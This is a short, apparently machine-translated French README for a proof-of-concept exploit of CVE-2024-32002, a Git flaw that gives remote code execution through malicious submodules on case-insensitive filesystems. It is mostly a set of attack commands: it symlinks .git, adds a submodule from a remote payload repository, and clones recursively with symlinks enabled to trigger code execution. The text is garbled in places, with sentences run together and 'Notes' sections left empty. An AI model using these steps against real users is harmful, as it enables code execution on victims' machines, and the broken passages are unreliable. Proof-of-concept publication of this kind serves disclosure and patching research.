
Exploit de preuve de concept pour CVE-2024-32002, démontrant l'exécution de code à distance via des sous-modules Git malveillants sur des systèmes de fichiers insensibles à la casse.
Un POC pour CVE-2024-32002 démontrant l'exécution de code à distance (RCE).
Voir cve-2024-32002-poc-rce pour le dépôt de sous-module associé.
.git..gitmodules qui définit le sous-module malveillant.Ce dépôt a été créé sous Linux (WSL2, pour être précis). C'est important, le dépôt malveillant ne peut être créé que sur un système de fichiers sensible à la casse.
ln -s .git submodule
Notes :
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Notes :
.git qui suit l'état git des sous-modules.Cette vulnérabilité n'affecte que Windows et MacOS car ils ont tous deux des systèmes de fichiers insensibles à la casse.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git